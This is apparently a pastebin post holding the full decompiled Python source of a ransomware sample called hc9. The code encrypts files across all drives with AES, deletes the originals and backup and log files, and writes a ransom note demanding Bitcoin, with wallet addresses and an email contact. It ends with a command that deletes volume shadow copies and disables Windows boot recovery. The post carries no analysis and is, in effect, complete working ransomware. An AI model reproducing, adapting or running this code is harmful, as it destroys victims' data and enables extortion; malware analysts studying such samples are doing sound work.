Demonslay335

hc9-81.pyc_dis

Dec 3rd, 2017
  1. # Embedded file name: hc9.py
  2. import win32api
  3. from Crypto.Hash import SHA256
  4. from Crypto.Cipher import AES
  5. import os, random, sys
  6. import subprocess
  7. import base64
  8. suffix = '.GOTYA'
  9. valid_extension = ['.txt',
  10. '.exe',
  11. '.php',
  12. '.pl',
  13. '.log',
  14. '.vhd',
  15. '.vhdx',
  16. '.lic',
  17. '.cab',
  18. '.7z',
  19. '.rar',
  20. '.m4a',
  21. '.wma',
  22. '.avi',
  23. '.wmv',
  24. '.csv',
  25. '.d3dbsp',
  26. '.sc2save',
  27. '.sie',
  28. '.sum',
  29. '.ibank',
  30. '.t13',
  31. '.t12',
  32. '.qdf',
  33. '.gdb',
  34. '.tax',
  35. '.pkpass',
  36. '.bc6',
  37. '.bc7',
  38. '.bkp',
  39. '.qic',
  40. '.bkf',
  41. '.sidn',
  42. '.sidd',
  43. '.mddata',
  44. '.itl',
  45. '.itdb',
  46. '.icxs',
  47. '.hvpl',
  48. '.hplg',
  49. '.hkdb',
  50. '.mdbackup',
  51. '.syncdb',
  52. '.gho',
  53. '.cas',
  54. '.svg',
  55. '.map',
  56. '.wmo',
  57. '.itm',
  58. '.sb',
  59. '.fos',
  60. '.mcgame',
  61. '.vdf',
  62. '.ztmp',
  63. '.sis',
  64. '.sid',
  65. '.ncf',
  66. '.menu',
  67. '.layout',
  68. '.dmp',
  69. '.blob',
  70. '.esm',
  71. '.001',
  72. '.vtf',
  73. '.dazip',
  74. '.fpk',
  75. '.mlx',
  76. '.kf',
  77. '.iwd',
  78. '.vpk',
  79. '.tor',
  80. '.psk',
  81. '.rim',
  82. '.w3x',
  83. '.fsh',
  84. '.ntl',
  85. '.arch00',
  86. '.lvl',
  87. '.snx',
  88. '.cfr',
  89. '.ff',
  90. '.vpp_pc',
  91. '.lrf',
  92. '.m2',
  93. '.mcmeta',
  94. '.vfs0',
  95. '.mpqge',
  96. '.kdb',
  97. '.db0',
  98. '.mp3',
  99. '.upx',
  100. '.rofl',
  101. '.hkx',
  102. '.bar',
  103. '.upk',
  104. '.das',
  105. '.iwi',
  106. '.litemod',
  107. '.asset',
  108. '.forge',
  109. '.ltx',
  110. '.bsa',
  111. '.apk',
  112. '.re4',
  113. '.sav',
  114. '.lbf',
  115. '.slm',
  116. '.bik',
  117. '.epk',
  118. '.rgss3a',
  119. '.pak',
  120. '.big',
  121. '.unity3d',
  122. '.wotreplay',
  123. '.xxx',
  124. '.desc',
  125. '.py',
  126. '.m3u',
  127. '.flv',
  128. '.js',
  129. '.css',
  130. '.rb',
  131. '.png',
  132. '.jpeg',
  133. '.p7c',
  134. '.p7b',
  135. '.p12',
  136. '.pfx',
  137. '.pem',
  138. '.crt',
  139. '.cer',
  140. '.der',
  141. '.x3f',
  142. '.srw',
  143. '.pef',
  144. '.ptx',
  145. '.r3d',
  146. '.rw2',
  147. '.rwl',
  148. '.raw',
  149. '.raf',
  150. '.orf',
  151. '.nrw',
  152. '.mrwref',
  153. '.mef',
  154. '.erf',
  155. '.kdc',
  156. '.dcr',
  157. '.cr2',
  158. '.crw',
  159. '.bay',
  160. '.sr2',
  161. '.srf',
  162. '.arw',
  163. '.3fr',
  164. '.dng',
  165. '.jpeg',
  166. '.jpg',
  167. '.cdr',
  168. '.indd',
  169. '.ai',
  170. '.eps',
  171. '.pdf',
  172. '.pdd',
  173. '.psd',
  174. '.dbfv',
  175. '.mdf',
  176. '.wb2',
  177. '.rtf',
  178. '.wpd',
  179. '.dxg',
  180. '.xf',
  181. '.dwg',
  182. '.pst',
  183. '.accdb',
  184. '.mdb',
  185. '.pptm',
  186. '.pptx',
  187. '.ppt',
  188. '.xlk',
  189. '.xlsb',
  190. '.xlsm',
  191. '.xlsx',
  192. '.xls',
  193. '.wps',
  194. '.docm',
  195. '.docx',
  196. '.doc',
  197. '.odb',
  198. '.odc',
  199. '.odm',
  200. '.odp',
  201. '.ods',
  202. '.odt',
  203. '.sql',
  204. '.zip',
  205. '.tar',
  206. '.tar.gz',
  207. '.tgz',
  208. '.biz',
  209. '.ocx',
  210. '.html',
  211. '.htm',
  212. '.3gp',
  213. '.srt',
  214. '.cpp',
  215. '.mid',
  216. '.mkv',
  217. '.mov',
  218. '.asf',
  219. '.mpeg',
  220. '.vob',
  221. '.mpg',
  222. '.fla',
  223. '.swf',
  224. '.wav',
  225. '.qcow2',
  226. '.vdi',
  227. '.vmdk',
  228. '.vmx',
  229. '.gpg',
  230. '.aes',
  231. '.ARC',
  232. '.PAQ',
  233. '.tar.bz2',
  234. '.tbk',
  235. '.djv',
  236. '.djvu',
  237. '.bmp',
  238. '.cgm',
  239. '.tif',
  240. '.tiff',
  241. '.NEF',
  242. '.cmd',
  243. '.class',
  244. '.jar',
  245. '.java',
  246. '.asp',
  247. '.brd',
  248. '.sch',
  249. '.dch',
  250. '.dip',
  251. '.vbs',
  252. '.asm',
  253. '.pas',
  254. '.ldf',
  255. '.ibd',
  256. '.MYI',
  257. '.MYD',
  258. '.frm',
  259. '.dbf',
  260. '.SQLITEDB',
  261. '.SQLITE3',
  262. '.asc',
  263. '.lay6',
  264. '.lay',
  265. '.ms11 (Security copy)',
  266. '.sldm',
  267. '.sldx',
  268. '.ppsm',
  269. '.ppsx',
  270. '.ppam',
  271. '.docb',
  272. '.mml',
  273. '.sxm',
  274. '.otg',
  275. '.slk',
  276. '.xlw',
  277. '.xlt',
  278. '.xlm',
  279. '.xlc',
  280. '.dif',
  281. '.stc',
  282. '.sxc',
  283. '.ots',
  284. '.ods',
  285. '.hwp',
  286. '.dotm',
  287. '.dotx',
  288. '.docm',
  289. '.DOT',
  290. '.max',
  291. '.xml',
  292. '.uot',
  293. '.stw',
  294. '.sxw',
  295. '.ott',
  296. '.csr',
  297. '.key',
  298. 'wallet.dat']
  299.  
  300. def encrypt(key, file_name):
  301. chunk_s = 65536
  302. output_file = os.path.join(os.path.dirname(file_name), os.path.basename(file_name) + suffix)
  303. fsize = str(os.path.getsize(file_name)).zfill(16)
  304. ini_vect = ''
  305. for i in range(16):
  306. ini_vect += chr(random.randint(0, 255))
  307.  
  308. encryptor = AES.new(key, AES.MODE_CBC, ini_vect)
  309. with open(file_name, 'rb') as infile:
  310. with open(output_file, 'wb') as outfile:
  311. outfile.write(fsize)
  312. outfile.write(ini_vect)
  313. while True:
  314. chunk = infile.read(chunk_s)
  315. if len(chunk) == 0:
  316. break
  317. elif len(chunk) % 16 != 0:
  318. chunk += ' ' * (16 - len(chunk) % 16)
  319. outfile.write(encryptor.encrypt(chunk))
  320.  
  321.  
  322. def getDigest(password):
  323. hasher = SHA256.new(password)
  324. return hasher.digest()
  325.  
  326.  
  327. readmename = 'RECOVERY.txt'
  328.  
  329. def files2crypt(path):
  330. allFiles = []
  331. for root, subfiles, files in os.walk(path):
  332. if 'System32' in root:
  333. pass
  334. for names in files:
  335. allFiles.append(os.path.join(root, names))
  336.  
  337. return allFiles
  338.  
  339.  
  340. def run_crypt():
  341. drives = win32api.GetLogicalDriveStrings()
  342. drives = drives.split('\x00')[:-1]
  343. if len(sys.argv) < 2:
  344. print 'File Corrupted'
  345. sys.exit(0)
  346. computer_id = base64.b64encode(str(os.environ['COMPUTERNAME']) + '-081')
  347. trukns = '9080(*{){){){){){){){){){){){){){){\n O489BU84BU84BU94BU94BU94UB94BU9B4U9B\n 2U0B202..0H2.H20.H2.0H2.0H2.0H2.0H\n SOH8484BU9O48BU984BUO948UBO498BO49U8BO49U8B\n o(EH*e(d#*(*!@$&(*@&#$(*#&$(*273998374987#(*$&(#$*987987$(*&#$(*#&$(&\n 98798&#$(*&(9879*#$&(*&(*&9*&(*&('
  348. password = sys.argv[1]
  349. if len(sys.argv) == 3:
  350. print 'Testing ' + sys.argv[2]
  351. encrypt(getDigest(password), str(sys.argv[2]))
  352. sys.exit(0)
  353. addresses = ['1CoxQUgDxbxcxFuU7u3nBZRYitouNJKyZs',
  354. '1ADFwZU8pR2z2CUUMNNRnczWUFkjBLybRj',
  355. '14waKKzAEQbTmM1Wyfax2N1cgjJbHjhH7J',
  356. '1C9veduaMxAy5nEAxBqwLqZ33ujPfeZ8z9']
  357. readme_str = '\nALL YOUR FILES WERE ENCRYPTED. \nTO RESTORE, YOU MUST SEND $700 BTC FOR ONE COMPUTER\nOR $5,000 BTC FOR ALL NETWORK\n'
  358. readme_str += 'ADDRESS: ' + random.choice(addresses)
  359. readme_str += '\nBEFORE PAYMENT SENT EMAIL m4zn0v@keemail.me\n'
  360. readme_str += 'ALONG WITH YOUR IDENTITY: ' + computer_id
  361. readme_str += '\nAND A SAMPLE FILE AS PROOF OF DECRYPT\n'
  362. readme_str += '\nNOT TO TURN OFF YOUR COMPUTER, UNLESS IT WILL BREAK\n'
  363. readme_str += '\n'
  364. for drive in drives:
  365. for file_pnt in files2crypt(drive):
  366. if os.path.basename(file_pnt).endswith(suffix) or os.path.basename(sys.executable) in file_pnt or os.path.basename(file_pnt).endswith('PsExec.exe') or 'RECOVERY.txt' in os.path.basename(file_pnt):
  367. pass
  368. else:
  369. extension = str(os.path.splitext(file_pnt)[1])
  370. if extension.lower() in valid_extension:
  371. try:
  372. encrypt(getDigest(password), str(file_pnt))
  373. os.remove(file_pnt)
  374. except:
  375. pass
  376.  
  377. elif '.bak' in extension or '.log' in extension:
  378. try:
  379. os.remove(file_pnt)
  380. except:
  381. pass
  382.  
  383. for root, subfiles, files in os.walk(drive):
  384. if 'System32' in root:
  385. pass
  386. try:
  387. readme = open(os.path.join(root, readmename), 'w')
  388. readme.write(readme_str)
  389. readme.close()
  390. except:
  391. pass
  392.  
  393. subprocess.Popen('wmic process call create'.split() + ['cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures'])
  394. sys.exit(0)
  395.  
  396.  
  397. run_crypt()